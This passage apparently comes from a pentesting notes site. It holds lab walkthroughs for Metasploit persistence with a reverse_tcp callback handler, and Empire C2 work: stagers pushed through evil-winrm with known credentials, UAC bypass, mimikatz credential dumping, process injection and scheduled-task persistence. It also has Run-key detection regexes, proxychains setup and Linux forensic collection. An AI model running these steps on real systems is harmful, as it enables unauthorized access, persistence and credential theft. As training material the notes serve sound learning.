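     re.compile(r'\b(?:wscript|cscript|mshta)(?:\.exe)?\b', re.I)),
    ('hidden or encoded PowerShell',
     re.compile(r'powershell.*?(?:-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s)', re.I)),
]


def parse_run_key(text):
    """Return [(name, type, data)] for every value line of reg query output."""
    values = []
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values.append((m.group('name'), m.group('type'), m.group('data').strip()))
    return values


def audit_run_key(text):
    """value name -> list of indicator labels, for suspicious entries only."""
    findings = {}
    for name, _type, data in parse_run_key(text):
        hits = [label for label, rx in INDICATORS if rx.search(data)]
        if hits:
            findings[name] = hits
    return findings


def cleanup_commands(text, run_key=r'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'):
    """reg delete / del commands that would remove each flagged entry (review before running)."""
    flagged = audit_run_key(text)
    cmds = []
    for name, _type, data in parse_run_key(text):
        if name in flagged:
            cmds.append('reg delete "%s" /v %s /f' % (run_key, name))
            m = SCRIPT_PATH.search(data)
            if m:
                cmds.append('del /f "%s"' % m.group(0))
    return cmds


if __name__ == '__main__':
    for name, hits in audit_run_key(REG_OUTPUT).items():
        print(name, '->', ', '.join(hits))
    print('\n'.join(cleanup_commands(REG_OUTPUT)))
```

Run the same audit against the HKCU Run key (and RunOnce) for a STARTUP USER install; registry_persistence leaves no script to delete, only the Run value and the registry blob it references, so for that module the reg delete lines are the whole cleanup.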
Background the session using ctrl + z, then select the exploit/windows/local/persistence module, set the session number, and configure the module to take effect when the system starts up: msf6 > use exploit/windows/local/persistence msf6 exploit(windows/local/persistence) > set STARTUP SYSTEM msf6 exploit(windows/local/persistence) > set LHOST 172.30.1.130 LHOST => 172.30.1.130 msf6 exploit(windows/local/persistence) > set LPORT 1234 LPORT => 1234 msf6 exploit(windows/local/persistence) > set SESSION 5 SESSION => 5 msf6 exploit(windows/local/persistence) > run (use the session id shown by sessions -l; STARTUP SYSTEM needs a SYSTEM-level session, which is what the MS17-010 exploit gives us). You can set STARTUP to USER instead if you are targeting a specific user logging in to the system; the Run key then goes under HKCU and needs no elevated privileges. 2. Setting up the handler for receiving the reverse connection\nmsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate msf6 exploit(multi/handler) > set LHOST 172.30.1.130 msf6 exploit(multi/handler) > set LPORT 1234 msf6 exploit(multi/handler) > exploit -j The payload and the LHOST/LPORT of the handler must match what the persistence module was given. Whenever the system boots (or the user logs in, with STARTUP USER) you will receive a connection back due to the payload; -j keeps the handler running as a background job so it is ready for every callback, and the AutoRunScript migrates the session into a more stable process as soon as it arrives.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/02-post-exploitation-using-meterpreter/","title":"Post Exploitation Using Meterpreter"},{"content":"After discovering the subdomains of a target domain, it's important to check each one to determine which subdomain leads to a login portal or a sensitive directory of the organization. However, there may be a lot of subdomains to check manually, and this process can be very time-consuming. 
As an aspiring penetration tester, you can be strategic and use a tool such as EyeWitness, which automates checking each subdomain listed in a file and takes a screenshot of it.\ninstallation: To install, run these commands: git clone https://github.com/RedSiege/EyeWitness.git cd EyeWitness/Python/setup sudo ./setup.sh (the directory is Python with a capital P on a case-sensitive file system; the setup script installs the Python dependencies plus Firefox and geckodriver, which EyeWitness uses to render the pages) After running these commands the tool is installed. Go back to the previous directory, then use the following commands to let EyeWitness capture a screenshot of each subdomain listed in your subdomains file (subdomains.txt here; the second run below uses MS-subdomains.txt, so substitute whatever you named the output of your subdomain enumeration): mkdir screenshots # run from the dir where the EyeWitness.py script is present ./EyeWitness.py --web -f /home/kali/subdomains.txt -d /home/kali/screenshots --prepend-https Syntax breakdown: --web: Takes HTTP/HTTPS screenshots -f: Specifies the source file containing the list of hosts to check -d: Specifies the output directory for the screenshots --prepend-https: Prepends http:// and https:// to entries that carry no protocol EyeWitness also writes an HTML report into the output directory; open it to triage the hosts that show login portals, admin panels or directory listings. I had various issues while installing this tool on newer Kali Linux, so I used a different method; to do this, follow the commands below:\ncd ~/Desktop/EyeWitness/ # 1. Create the virtual environment python3 -m venv .venv # 2. Activate it source .venv/bin/activate # 3. Install the required Python packages into it pip install -r ./Python/setup/requirements.txt # 4. Run EyeWitness (while the venv is still active) ./Python/EyeWitness.py --web -f /home/kali/MS-subdomains.txt -d /home/kali/screenshots_TUKL --prepend-https ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/02-profiling-websites-using-eyewitness/","summary":"\u003cp\u003eAfter discovering the subdomains of a target domain, it\u0026rsquo;s important to check each one to determine which subdomain leads to a login portal or a sensitive directory of the organization. 
However, there may be a lot of subdomains to check manually, and this process can be very time-consuming. As an aspiring penetration tester, you can be strategic and use a tool such as EyeWitness, which allows you to automate the process of checking each subdomain within a file and taking a screenshot of them.\u003c/p\u003e","title":"Profiling Websites Using EyeWitness"},{"content":" A proxy is a system, such as a server, that sits between a source and a destination host on a network. If a sender wants to communicate with a destination server, the sender forwards the message to the proxy, which forwards it on to the destination server. The destination server sees the message as originating from the proxy, not from the actual source. Penetration testers use proxychains to build a logical chain of connections through multiple proxy servers when sending traffic to a target network or the internet. Proxychains supports the following proxy types: HTTP (which also tunnels HTTPS through CONNECT) SOCKS4 SOCKS5 Tip You can use a website such as https://spys.one/en/, which provides a list of free proxy servers. Keep in mind that these servers may not always be online or available, and that a free proxy is an untrusted third party that can read and modify everything you send through it: never pass engagement credentials or client data through one, and make sure this kind of traffic routing is allowed by the rules of engagement.\nSetting up proxychains: Fire up Kali; first locate the proxychains config with this command: locate proxychains Now edit the config file: sudo vim /etc/proxychains4.conf Press esc, type :set number and hit enter to show line numbers. The line numbers below are from this particular Kali build; if your file differs, search for the option names instead (for example /dynamic_chain). Go to the 10th line, hit i to enter insert mode, and uncomment the dynamic_chain option. Move to the 18th line and comment out the strict_chain option, so that exactly one chain mode is active (dynamic_chain skips dead proxies in the list, strict_chain fails if any proxy in the chain is down). Now add the free proxy servers to the list: go to the end of the config file where it says ProxyList (you can search for it in vim by hitting / and typing /ProxyList, then enter). 
Add the proxy entries at the end, one per line in the form type host port, and comment out the default Tor entry socks4 127.0.0.1 9050 (otherwise every chain tries to go through a Tor client that is not running). Hit esc and type :wq to save. To test proxychains, run a program through it: proxychains4 firefox and confirm with a what-is-my-IP site that the address the destination sees is the last proxy in the chain rather than your own. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/02-proxychains/","summary":"\u003col\u003e\n\u003cli\u003eA proxy is a system such as a server that sits between a source and a destination host on a network. If a sender wants to communicate with a destination server, the sender forwards the message to the proxy, which is then forwarded to the destination server. The destination server will think the message is originating from the proxy and not the actual source.\u003c/li\u003e\n\u003cli\u003ePenetration testers use proxychains, which allow them to create a logical chain of connections between multiple proxy servers when sending traffic to a target network or the internet. Proxychains allow a penetration tester to configure various types of proxies, such as the following:\n\u003cul\u003e\n\u003cli\u003eHTTP\u003c/li\u003e\n\u003cli\u003eHTTPS\u003c/li\u003e\n\u003cli\u003eSOCK4\u003c/li\u003e\n\u003cli\u003eSOCK5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003e\u003cimg alt=\"pc_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/02/pc_1.png\"\u003e\u003c/p\u003e","title":"Proxychains Configuration"},{"content":"C2 OPERATION: Power on the main Kali Linux virtual machine (not the clone), open the Terminal, and use the ifconfig eth0 command (substitute whichever interface is your NAT interface) to determine the IP address on the eth0 interface as shown below: This IP address will act as the empire server, while the clone vm will act as the empire client. Start the maria DB service in the kali vm (not the clone): Next, use the following command to start the Empire server on the main Kali Linux virtual machine: sudo powershell-empire server 5. 
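The vim walkthrough above is fine once, but it is easy to end up with both chain modes commented out or a malformed proxy line. The script below is an added example (not from the notes and not part of proxychains-ng) that makes the same three edits with sed against a copy of the config, validates each proxy line before appending it, and checks the result. The trimmed sample config and the 203.0.113.x / 198.51.100.x proxies are constructed for the example.

```bash
#!/usr/bin/env bash
# Added example, not from the original notes or from proxychains-ng: the same
# edits as the vim walkthrough above, done with sed against a *copy* of
# /etc/proxychains4.conf so a typo cannot leave you with no working chain mode,
# plus a validator for the proxy lines you paste from a free-proxy list.
# The sample config and the 203.0.113.x / 198.51.100.x proxies are constructed.
set -u

# A trimmed stand-in for /etc/proxychains4.conf (constructed for this example).
SAMPLE_CONF='# proxychains.conf  VER 4.x
#dynamic_chain
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4 127.0.0.1 9050'

# Accept only "<type> <ipv4> <port> [user pass]" with a type proxychains4 knows.
validate_proxy_line() {       # $1=line
  local type ip port rest
  read -r type ip port rest <<EOF
$1
EOF
  case "$type" in http|socks4|socks5|raw) ;; *) return 1 ;; esac
  printf '%s' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  case "$port" in ''|*[!0-9]*) return 1 ;; esac
  [ "$port" -ge 1 ] && [ "$port" -le 65535 ]
}

# Rewrite a config in place: dynamic_chain on, strict_chain off, the default
# Tor entry commented out (no Tor client is running here), proxies appended.
configure_proxychains() {     # $1=config path  $2..=proxy lines
  local conf="$1" p
  shift
  for p in "$@"; do
    validate_proxy_line "$p" || { echo "rejected proxy line: $p" >&2; return 1; }
  done
  sed -i \
    -e 's/^#[[:space:]]*dynamic_chain[[:space:]]*$/dynamic_chain/' \
    -e 's/^strict_chain[[:space:]]*$/#strict_chain/' \
    -e 's/^\(socks4[[:space:]]*127\.0\.0\.1[[:space:]]*9050\)[[:space:]]*$/#\1/' \
    "$conf"
  for p in "$@"; do printf '%s\n' "$p" >> "$conf"; done
}

# Sanity check: exactly one chain mode active, Tor entry off, >= 1 live entry.
check_proxychains_conf() {    # $1=config path
  local conf="$1" n
  grep -q '^dynamic_chain' "$conf" || return 1
  ! grep -q '^strict_chain' "$conf" || return 1
  ! grep -q '^socks4[[:space:]]*127\.0\.0\.1[[:space:]]*9050' "$conf" || return 1
  n="$(sed -n '/^\[ProxyList\]/,$p' "$conf" | grep -Ec '^(http|socks4|socks5|raw)[[:space:]]')" || true
  [ "$n" -gt 0 ]
}

# Real run (back up first, then point proxychains4 at the edited copy with -f):
# sudo cp /etc/proxychains4.conf /etc/proxychains4.conf.bak
# cp /etc/proxychains4.conf ~/pc.conf && configure_proxychains ~/pc.conf "socks5 203.0.113.10 1080"
# check_proxychains_conf ~/pc.conf && proxychains4 -f ~/pc.conf firefox
```

Working on a copy and passing it with `proxychains4 -f` also keeps the system config untouched for other users of the box, and leaves `proxy_dns` enabled so hostname lookups go through the chain rather than leaking to the local resolver.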
Next, power on the Empire Client (clone of Kali Linux) virtual machine and edit the Empire client configuration file to insert the Empire server information:\nsudo nano /etc/powershell-empire/client/config.yaml Add the following entry at the end of the existing servers: list. It is YAML, so keep the two-space nesting exactly (the entry name is indented under servers:, and its settings under the name):\n  Empire-Server:\n    host: http://192.168.83.128   # main kali ip to connect the client with it\n    port: 1337\n    socketport: 5000\n    username: empireadmin\n    password: password123\nempireadmin / password123 are Empire\u0026rsquo;s default credentials; change them on the server before using it anywhere but an isolated lab (see Managing users on Empire below). 7. Now start the empire client from the cloned kali:\nsudo systemctl start mariadb.service sudo powershell-empire client 8. Establish the connection to the empire server. Before that, make sure the main kali machine\u0026rsquo;s firewall is not blocking tcp port 1337 for incoming connections (prefer a rule scoped to the client\u0026rsquo;s IP rather than 1337/tcp from anywhere, and do the same for the socketport 5000 if the client needs it):\n# on main kali machine sudo ufw status sudo ufw allow 1337/tcp # on EMPIRE CLIENT machine (Empire) \u0026gt; connect -c Empire-Server The same steps work inside a single kali machine too, using different terminal tabs.\nManaging users on Empire: On the Empire client console, execute the following commands to enter the administrative menu and view the list of current user accounts: (Empire) \u0026gt; admin (Empire: admin) \u0026gt; user_list 2. To create a new user on the Empire server, use create_user with the username NewUser1, the password Password123 and its confirmation, followed by the admin flag that makes the new account an administrator (leave it off for a regular operator account):\n(Empire: admin) \u0026gt; create_user NewUser1 Password123 Password123 admin (Empire: admin) \u0026gt; user_list 3. To disable a user account use the disable_user \u0026lt;User_id\u0026gt; command:\n(Empire: admin) \u0026gt; disable_user 1001 To view the commands available under a context menu, use the help command. The back command returns you to the previous menu and main takes you to the main menu within Empire. 
Post exploitation using Empire: We will be using our Windows Server 2019 as the target system for this exercise. Creating a listener: A listener is a module within the Empire server that listens for incoming connections from an agent running on a compromised host. Without a listener on the Empire server you cannot send instructions to the agents running on the compromised systems. On the empire client console, use the following command to set up an HTTP listener (Empire) \u0026gt; uselistener http 3. Change the name of the default listener using the command set Name \u0026lt;New_name\u0026gt;\n(Empire: uselistener/http) \u0026gt; set Name DC_Listener Next, configure the callback host and port. The host is the IP address on the eth0 interface of the Kali Linux machine on the (192.168.83.0/24) network that is running the Empire server, and the port is where the agents will call back to: (Empire: uselistener/http) \u0026gt; set Host 192.168.83.128 (Empire: uselistener/http) \u0026gt; set Port 1335 # allowed the connection on my main kali before running this command Type options to verify the changes. Start the listener with the command execute. Use the back command to go up a few levels (optional), then use the command listeners to see the listeners you have set up: (Empire: uselistener/http) \u0026gt; listeners The listener is now set up and waiting for incoming connections.\nCreating a stager: A stager is a module within Empire that penetration testers use to execute the agent (payload) on the targeted system. When an agent is executed on a compromised host, it attempts to connect back to the listener on the Empire server running on Kali Linux, which lets the penetration tester perform post-exploitation tasks on any active agent.\nOn the Empire client console, create a multi-launcher stager with the following command: (Empire) \u0026gt; usestager multi_launcher 2. 
Next, set the listener option to DC_Listener:\n(Empire: usestager/multi_launcher) \u0026gt; set Listener DC_Listener Generate the stager (a malicious PowerShell one-liner) using the command generate (Empire: usestager/multi_launcher) \u0026gt; generate 4. Next, open a new Terminal on the main kali and use Evil-WinRM to establish a PowerShell session on the Windows Server 2019 (in this lab the Administrator credentials are already known, so WinRM is only the delivery vector for the stager):\nevil-winrm -i 192.168.83.140 -u Administrator -p P@ssword1 5. Then paste the generated code into this evil-winrm session. working with agents: To view the list of agents inside the empire client use the command agents I have multiple sessions, but you should have one session for now. 2. Whenever you see an asterisk (*) next to the name of an agent, that agent is running with elevated privileges. 3. To interact with an agent use the command interact \u0026lt;agent_id\u0026gt; and use the help command to see the commands you can run 4. Additionally, to determine whether the agent is running with elevated privileges on the compromised host, use the following command:\n(Empire: YDPKMU42) \u0026gt; display high_integrity 5. If the agent is not running with elevated privileges, you can use the bypassuac command to escalate privileges; it spawns a new, elevated agent on the given listener:\nbypassuac DC_Listener To remotely execute a command on the compromised host, use shell \u0026lt;command\u0026gt;: (Empire: YDPKMU42) \u0026gt; shell whoami (Empire: YDPKMU42) \u0026gt; shell ipconfig 7. Running mimikatz for credential dumping (this needs an elevated agent): 8. To see the loot use the command credentials Creating a new agent: During a penetration test, having multiple connections or reverse shells on compromised hosts is especially useful in case one shell is unexpectedly terminated. 
Using Empire, you can create multiple agents on the same compromised host from an existing agent with the following instructions (I am already running 2 shells on the same machine and used 2 different agents):\nInteract with the agent first: List all the processes using the ps command We can use the PID of a common, less conspicuous process such as wsmprovhost (the WinRM host process, which is where the evil-winrm session itself runs) on the compromised host to spawn a new agent. Bear in mind that an injected agent lives and dies with its host process, so for anything you rely on pick a long-lived process. Create the new agent with the psinject command: (Empire: CSM26U8L) \u0026gt; psinject DC_Listener 2268 5. As shown in the preceding screenshot, the new agent has spawned. Notice that the new agent is created with elevated privileges because wsmprovhost was running as the local Administrator account. If the new agent is not running with elevated privileges, you won\u0026rsquo;t be able to perform administrative or high-privilege tasks on the compromised host and will need to elevate the new agent first. 6. Use the following commands to interact with the compromised host and spawn a command shell in the empire client Threat emulation: Threat emulation focuses on testing an organization\u0026rsquo;s cyber defenses and their ability to detect and prevent the techniques used by threat actors. Using Empire\u0026rsquo;s malleable profiles during a penetration test engagement tests whether the targeted organization can detect unknown threats disguised as common network traffic such as Windows Update, Gmail and Office 365 traffic.\nOn the Empire client use the http_malleable listener module: (Empire: agents) \u0026gt; uselistener http_malleable 2. Follow the given screenshots for setting up the listener: use the port 9443 Also make sure that incoming connections on this port are allowed on your server machine, or the agents will never reach the listener: 3. Then create a new stager for the listener ThreatEmulation: 4. Then paste and execute the generated code inside the evil-winrm session of the target: 5. 
You should be able to see a new agent check in inside the empire client 6. Interact with the agent: Setting up persistence: Establishing persistence on a compromised host ensures you have access to it at any time while it is online on the target network, surviving reboots and, to a degree, the defensive measures applied afterwards. During a penetration test this step must be explicitly part of the engagement scope.\nImportant When setting up persistence, be mindful that the persistence modules create intentional backdoors on the compromised systems, which may allow other threat actors to gain access. Persistence should only be used during a penetration test if it is needed and within the scope of the engagement. If you set up persistence on compromised hosts, record exactly what was created (task name, script path, registry value) and remove it at the end of the test to prevent unauthorized access by other threat actors.\nStart by interacting with an active agent that has elevated privileges and load the scheduled task persistence module: (Empire: X65ZRGUH) \u0026gt; usemodule powershell_persistence_elevated_schtasks 2. 
Options and execution: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/02-c2-operation-setup/","summary":"\u003ch2 id=\"c2-operation\"\u003eC2 OPERATION:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003ePower on the main Kali Linux virtual machine (not the clone), open the Terminal, and use the ifconfig eth0{whatever interface you are having as NAT} command to determine the IP address on the eth0 interface as shown below:\n\u003cimg alt=\"c2_op_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/01/c2_op_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eThis ip address will act as an \u003ccode\u003eempire server\u003c/code\u003e , while the clone vm will act as a \u003ccode\u003eempire client\u003c/code\u003e .\u003c/li\u003e\n\u003cli\u003eStart the \u003ccode\u003emaria DB\u003c/code\u003e service in the kali vm(not the clone) :\n\u003cimg alt=\"c2_op_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/01/c2_op_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eNext, use the following commands to start the Empire server on the main Kali Linux virtual machine:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo powershell-empire server\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"c2_op_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/C2/01/c2_op_3.png\"\u003e\n5. 
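Two things on this page are easy to get wrong on the Kali side: the client config.yaml entry (shown flattened above, although YAML nesting is significant) and the firewall rules, which the steps open for the API port only while the listeners later use 1335 and 9443. The script below is an added example, not code from the notes or from Empire: it inserts the server block directly under the `servers:` key, refuses duplicates, and checks `ss -ltn` for the ports the client and the agents will need before you run `connect -c`. The sample config, the 192.168.83.128 address, the ports and the empireadmin / password123 credentials are the lab placeholders from the notes.

```bash
#!/usr/bin/env bash
# Added example, not from the original notes or from Empire: writes the client's
# server entry into config.yaml with the YAML nesting Empire expects, refuses
# to add the same server twice, and checks that the server's API/socket ports
# (and later the listener ports) are actually listening before `connect -c`.
# The 192.168.83.128 address, the ports and empireadmin/password123 are the lab
# placeholders from the notes; the credentials are Empire's defaults and should
# be changed on the server (admin menu, create_user / disable_user).
set -u

# Insert one server block directly under the `servers:` key (creating the key
# if the file has none). Returns 2 if a server with that name already exists.
empire_add_server() {         # $1=config.yaml $2=name $3=host URL $4=port $5=socketport $6=user $7=pass
  local conf="$1" name="$2" host="$3" port="$4" sport="$5" user="$6" pass="$7" block
  case "$host" in
    http://*|https://*) ;;
    *) echo "host must start with http:// or https://, got '$host'" >&2; return 1 ;;
  esac
  if grep -Eq "^  ${name}:[[:space:]]*$" "$conf"; then
    echo "server '$name' is already defined in $conf" >&2; return 2
  fi
  grep -q '^servers:' "$conf" || printf 'servers:\n' >> "$conf"
  block="$(mktemp)"
  printf '  %s:\n    host: %s\n    port: %s\n    socketport: %s\n    username: %s\n    password: %s\n' \
    "$name" "$host" "$port" "$sport" "$user" "$pass" > "$block"
  sed -i "/^servers:/r $block" "$conf"     # GNU sed: append the block right after the servers: line
  rm -f "$block"
}

# True only if every given port appears as a LISTEN socket in `ss -ltn` output
# (pass the output explicitly, or "" to run ss on this host).
empire_ports_listening() {    # $1=ss -ltn output or ""  $2..=ports
  local out="${1:-$(ss -ltn 2>/dev/null)}" p
  shift
  for p in "$@"; do
    printf '%s\n' "$out" | grep -Eq "LISTEN.*[:.]${p}[[:space:]]" || return 1
  done
}

# Lab run: add the entry from the notes on the client, then, on the server,
# confirm the API (1337), socket (5000) and listener ports are up before opening
# them in ufw to the client / target subnet only.
# empire_add_server /etc/powershell-empire/client/config.yaml Empire-Server http://192.168.83.128 1337 5000 empireadmin password123
# empire_ports_listening "" 1337 5000 && echo "API and socket ports are listening"
# empire_ports_listening "" 1335 9443 && echo "DC_Listener and ThreatEmulation listeners are listening"
```

Run the port check again after `execute` on each listener: a listener that shows in `listeners` but not in `ss -ltn` (port clash, bind error) is the usual reason a pasted stager never checks in.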
Next, power on the \u003ccode\u003eEmpire Client\u003c/code\u003e (clone of Kali Linux) virtual machine and use the following commands to edit the Empire client configuration file to insert the Empire server information:\u003c/p\u003e","title":"Setting Up C2 Operations"},{"content":"The Open Vulnerability Assessment Scanner (OpenVAS) tool is a free vulnerability scanner that allows both ethical hackers and penetration testers to perform a vulnerability assessment on a network. OpenVAS can scan both authenticated and unauthenticated vulnerability assets within an organization. Greenbone Vulnerability Manager (GVM) is a centralized management tool that manages the functions and vulnerabilities of OpenVAS. In this exercise, you will learn how to set up GVM on Kali Linux and perform a vulnerability assessment on a target using OpenVAS.\nInstallation guide: Open up a terminal in kali linux: sudo apt update sudo apt install gvm Once the installation is complete, use the following command: sudo gvm-setup It will take some time to fetch the upgrades and then provide one more time the username and password. 3. Next, use the sudo gvm-start command to start the GVM service. 4. changing the password of gvm\nsudo runuser -u _gvm -- gvmd --user=admin --new-password=\u0026lt;new-password\u0026gt; After logging in To add a target -\u0026gt; click on configuration -\u0026gt; Targets -\u0026gt; New target button\nAdd the details on Name and Hosts and click save To scan a target -\u0026gt; click on scan -\u0026gt; Tasks -\u0026gt; new tasks click on the play button and complete the scan. It may take some time to sync the tasks. 
GVM-DOC ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/02-working-with-greenbone-vuln-manager/","summary":"\u003cp\u003e\u003ccode\u003eThe Open Vulnerability Assessment Scanner (OpenVAS)\u003c/code\u003e tool is a free vulnerability scanner that allows both ethical hackers and penetration testers to perform a vulnerability assessment on a network. OpenVAS can scan both authenticated and unauthenticated vulnerability assets within an organization.\n\u003cstrong\u003eGreenbone Vulnerability Manager (GVM)\u003c/strong\u003e is a centralized management tool that manages the functions and vulnerabilities of OpenVAS. In this exercise, you will learn how to set up GVM on Kali Linux and perform a vulnerability assessment on a target using OpenVAS.\u003c/p\u003e","title":"Working With Greenbone Vulnerability Manager"},{"content":"Volatile: Collecting hostname, date and time: hostname hostnamectl date cat /etc/timezone timedatectl epoch time: date +%s system uptime: uptime Network information: ip a # short form of ip addr show ifconfig # promisc mode detection: ifconfig eth0 ip link show eth0 # other network info commands: netstat -i netstat -rn # routing tables ip r # routing tables open port info: nmap -sT localhost nmap -sU localhost # UDP port sudo lsof -i tcp # checking tcp listening connections of localhost sudo lsof -n -P | grep LISTEN netstat -tulpn listing current user\u0026rsquo;s open processes: sudo lsof -u user_name mounted file system info: mount # info about file systems df -h # file systems info but in human readable format kernel module info, sound driver info: modinfo ufs # kernel module modinfo snd # sound module info user event collection: id Reading ELF file: readelf -h file_name # file header reading running processes: ps aux -ww swap area and disk partition info: cat /proc/partitions # disk partition cat /proc/swaps # swap info kernel message - kernel ring buffer info: dmesg 
Non-volatile: Collecting system info: cat /proc/cpuinfo cat /proc/self/mounts kernel info: uname -r cat /proc/version hostnamectl | grep Kernel local user account information: cat /etc/passwd cat /etc/passwd | cut -d: -f1 # separating the user names from the output logged on user information: w last # login history information collecting system logs: cat /var/log/syslog cat /var/log/kern.log # linux kernel logs cat /var/log/fail.log cat /var/log/mail.* cat /var/log/mysql.* cat /var/log/daemon.log cat /var/log/debug journalctl history and hidden file information: history ls -al # hidden files suspicious info: sudo rkhunter --check --rwo sudo chkrootkit # rootkit checker file signature analysis: xxd file_name | head -n 10 basic file information: file file_name strings -t d file_name # -t d prints the decimal offset of each string (the option takes the radix as its argument, so -t -d is invalid) finding writable files inside the /var/log directory: find / -writable -type f 2\u0026gt; /dev/null | grep \u0026#34;/var/log\u0026#34; Directory permission checking: ls -ld Desktop File system analysis using The Sleuth Kit: Creating a file system image using dd: Important Before that, add a virtual hard disk of 1gb for testing purposes to your vm through vmware -\u0026gt; vm settings -\u0026gt; add -\u0026gt; hard disk -\u0026gt; SCSI -\u0026gt; Create new virtual disk -\u0026gt; 1 gb -\u0026gt; Done.\nThen use the following guide. Note that this is a lab exercise: the dd copy is formatted afterwards so that test evidence can be planted in it. With a real acquired image you would never run mkfs on it; you would hash it with sha256sum right after imaging, work on a copy, and mount that copy read-only (ro).\nsudo dd if=/dev/sdb of=/home/user_name/Desktop/virtual_disk.img bs=4M status=progress # do every step below as the root user mkfs.ext4 Desktop/virtual_disk.img # mkfs warns that the image is not a block special device; confirm to proceed # mounting the file system mkdir /mnt/my_image mount -o loop Desktop/virtual_disk.img /mnt/my_image # creating evidence echo \u0026#34;This is a secret message\u0026#34; \u0026gt; /mnt/my_image/secret.txt touch /mnt/my_image/evidence.dat # unmount afterwards umount /mnt/my_image analysis: # install sleuth kit sudo apt install sleuthkit sudo fsstat -i raw Desktop/virtual_disk.img # file system details sudo fls Desktop/virtual_disk.img # list files with their inode numbers istat Desktop/virtual_disk.img 12 # metadata of inode 12, the first file fls listed; use the inode number fls shows for your file 
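The volatile section above lists the commands but not how to run them so the output is usable as evidence: in order of volatility, with every command's output, errors and exit status preserved, and with hashes taken at collection time so a reviewer can prove nothing changed afterwards. The script below is an added example, not code from the original notes; it wraps those same commands (and their `ss` equivalents on systems without netstat) into a case directory with a SHA-256 manifest. Case directory names are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not from the original notes: runs the volatile-data commands
# from the section above in order of volatility (process/memory state first,
# disk layout and kernel messages last), stores each command's stdout, stderr
# and exit status in a case directory, and keeps a SHA-256 manifest so the
# collection can be verified later with `sha256sum -c`. Commands that are not
# installed on the box (ifconfig, netstat on newer distros) are recorded as
# failures rather than aborting the run. Case directory names are placeholders.
set -u

# Default command list, most volatile first; one command per line.
VOLATILE_CMDS='date +%s
date
uptime
ps aux -ww
ip a
ip r
ss -tulpn
netstat -tulpn
ifconfig
w
id
mount
cat /proc/partitions
cat /proc/swaps
hostnamectl
dmesg'

# Run one command, keep stdout/stderr/status, and hash the stdout file.
# Returns the command's own exit status.
collect_one() {               # $1=case dir  $2=index  $3=command line
  local dir="$1" idx="$2" cmd="$3" name status=0
  name="$(printf '%02d' "$idx")_$(printf '%s' "$cmd" | tr -c 'A-Za-z0-9' '_')"
  ( eval "$cmd" ) > "$dir/$name.out" 2> "$dir/$name.err" || status=$?
  echo "$status" > "$dir/$name.status"
  ( cd "$dir" && sha256sum "$name.out" >> MANIFEST.sha256 )
  return "$status"
}

# Run the whole list into the case directory; failures are counted, not fatal.
collect_volatile() {          # $1=case dir  [$2=command list, default VOLATILE_CMDS]
  local dir="$1" list="${2:-$VOLATILE_CMDS}" idx=0 failed=0 cmd
  mkdir -p "$dir"
  : > "$dir/MANIFEST.sha256"
  { echo "collector=$(id -un)@$(uname -n)"; echo "started_epoch=$(date +%s)"; } > "$dir/COLLECTION.txt"
  while IFS= read -r cmd; do
    [ -n "$cmd" ] || continue
    idx=$((idx + 1))
    collect_one "$dir" "$idx" "$cmd" || failed=$((failed + 1))
  done <<EOF
$list
EOF
  echo "finished_epoch=$(date +%s)" >> "$dir/COLLECTION.txt"
  echo "failed=$failed" >> "$dir/COLLECTION.txt"
}

# Number of commands that failed during collection.
collection_failures() {       # $1=case dir
  sed -n 's/^failed=//p' "$1/COLLECTION.txt"
}

# Re-hash every output file against the manifest; non-zero means evidence changed.
verify_manifest() {           # $1=case dir
  ( cd "$1" && sha256sum -c --status MANIFEST.sha256 )
}

# Typical use on the suspect host (run as root so ss/dmesg/ps see everything,
# and write to removable or network storage, not to the disk under analysis):
# collect_volatile /mnt/evidence/case-001/volatile && verify_manifest /mnt/evidence/case-001/volatile
```

Keep `MANIFEST.sha256` and `COLLECTION.txt` together with the outputs; re-running `verify_manifest` before analysis and again before hand-over is what turns a pile of command output into evidence with a chain of custody.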
